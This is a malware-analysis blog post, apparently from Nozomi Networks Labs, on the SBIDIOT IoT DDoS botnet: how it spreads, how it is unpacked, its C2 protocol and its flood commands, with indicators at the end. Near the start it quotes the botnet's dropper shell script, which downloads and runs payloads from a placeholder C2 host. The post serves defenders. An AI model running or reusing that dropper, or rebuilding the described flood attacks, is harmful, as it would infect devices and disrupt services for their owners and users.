There are billions of IoT connections in the world and more than 70 percent of them are in the industrial sector. This is why Nozomi Networks Labs regularly reviews the threat landscape for IoT devices. Recently, a malware sample named SBIDIOT caught our attention. It had a relatively low number of detections on VirusTotal and its commands, in the current form, were not well documented by the cybersecurity community.
We decided to analyze SBIDIOT and uncovered how it communicates with targets and what types of commands it supports. This information helps detect the threat and allows defenders to stop or mitigate it before harmful impacts occur. The main potential impact of DDoS (Distributed Denial of Service) botnets is the generation of excessively high loads on targeted servers, preventing users from accessing services and thus harming normal business operations.
To avoid impacts, early detection is vital. Detection can be done by your security team (see the malware indicators at the end of this article) or by using a network monitoring and threat intelligence solution such as ours.
Analysis of SBIDIOT Malware
Based on our information, at least one way that the malware propagates is by exploiting an RCE vulnerability in ZTE routers. For older versions, we observed a shell script sh downloading and executing binary payloads once delivered to the victim machines by various means:
#!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/x86; curl -O http://<cnc_ip>/SBIDIOT/x86;cat x86 >SSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/mips; curl -O http://<cnc_ip>/SBIDIOT/mips;cat mips >SSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/mpsl; curl -O http://<cnc_ip>/SBIDIOT/mpsl;cat mpsl >SSH;chmod +x *;./SSH SSH cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://<cnc_ip>/SBIDIOT/arm; curl -O http://<cnc_ip>/SBIDIOT/arm;cat arm >SSH;chmod +x *;./SSH SSH ...
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 is packed with the standard UPX tool, with the UPX header later modified. While the malware remains executable, it is no longer possible to unpack it using the same tool straight away:
$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header $ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 File size Ratio Format Name --------- ------ ----- ---- upx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: NotPackedException: not packed by UPX Unpacked 0 files.
As we can see here, the
UPX! signature was replaced with a custom
Restoring it back will enable us to unpack the sample using the standard UPX tool:
$ perl -pi -e 's/YTS\x99/UPX!/g' e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 $ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 File size Ratio Format Name --------- ------ ----- ---- 55372 <- 30024 54.22% linux/i386 e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 Unpacked 1 file. $ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
The analysis reveals characteristics quite common for this type of threat. There is a strong focus on DDoS with some parts of the code shared with other malware families like Gafgyt.
Given that the sample is statically linked and stripped, which is almost always the case with malware targeting IoT, the next step was to load FLIRT signatures for uClibc to make analysis easier. uClibc is a compact C library commonly used in Linux kernel-based embedded devices, which is also commonly used by IoT malware developers for easy cross-compilation, as popularized with Mirai. FLIRT signatures are essentially a method that reverse engineering tools like IDA use to pattern-match known libraries, which can greatly speed up the analysis process.
Upon execution, the sample attempts to connect to its C2, which in this case is an IP address and port hard-coded into the binary. Although the C2 infrastructure was not operational during the time of the investigation, we were able to force the sample to talk to our own server as its C2. Coupled with some static analysis, this was enough to quickly figure out the protocol and begin interaction.
The function responsible for handling commands compares each command received from C2 with one of the following strings:
Then, based on the results, it performs several validation checks on its arguments before executing the actual command.
Commands Supported by SBIDIOT
The TCP command asks the bot to send TCP segments destined for a specified host/port combination for a specified interval of time. Additionally, it allows the operator to set a number of optional TCP flags.
As arguments, it takes in an HTTP method, a host/port combination, an attack duration and a request count specifying how many times to repeat this operation. If the attack duration and the request count are not exceeded, this function will continue to perform HTTP requests using the settings provided and a randomly selected user-agent string.
Additionally, another function is called to perform HTTP requests to the /cdn-cgi/l/chk_captcha URI of a hostname/port combo with, once again, a configurable attack duration and request count. This is done in an attempt to circumvent CloudFlare protection mechanisms.
Another command used for DDoS, which, depending on the arguments provided, employs either UDP or RAW sockets. Again, arguments for the target and attack duration can be provided, but additionally, the attacker can specify a pause interval between packets delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE command to target servers running the Valve Source Engine.
The VOX command takes a host, a port and an attack duration as its arguments and then sends UDP datagrams with one of three randomly selected hard-coded payloads.
The sample sends UDP payloads to a target host specifying the port, the attack duration and the maximum size of the generated payload. The actual size of the payload may be smaller due to the use of the
strlen function, which calculates the size by counting bytes up until the first null value.
HEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH
All of the above commands call the same function, which receives a host name, a port and an attack duration, then starts generating UDP traffic with a fixed payload.
This command sends a SIGKILL signal to all process IDs that are currently being tracked, giving the operator the ability to stop any of the process’ children.
Threat Intelligence is Needed to Defend Industrial Systems from IoT Malware
As the number of Internet-connected devices increases at a rate of more than 130 percent a year,1 the threat landscape also rapidly evolves. New families of malware and modifications of existing ones emerge regularly. And, regardless of their complexity and sophistication, they all pose a threat.
To defend against threats to IoT devices that could impact production, uptime and possibly safety, automated tools can help. OT/IoT network monitoring paired with regularly updated threat intelligence identifies indicators of compromise and anomalous behavior, giving you the opportunity to act before harm occurs.
Nozomi Networks Labs is committed to providing real-time information on IoT threats as they continue to increase in prevalence and significance for operational technology environments – stay-tuned for ongoing updates.
For indicators of SBIDIOT malware, see the information provided at the end of this page.
- “The Internet of Things: Consumer, Industrial & Public Services 2020-2024,” Juniper Networks, March 31, 2020.
OT/IoT Security Report
What You Need to Know to Fight Ransomware and IoT Vulnerabilities – July 2021
- Why ransomware is a formidable threat
- Analysis of DarkSide, the malware that attacked Colonial Pipeline
- Latest ICS and medical device vulnerability trends
- Why P2P security camera architecture threatens confidentiality
- How security cameras are vulnerable
- Ten measures to take immediately to defend your systems
SBIDIOT Malware Indicators
Same as for most modern IoT malware families, there are multiple other URLs associated with the same C&C delivering payloads compiled for other architectures:
Other C&C IP addresses seen in 2021:
Other commonly used filenames:
- sh (located in the root directory rather than in the SBIDIOT subdirectory like the rest of the samples)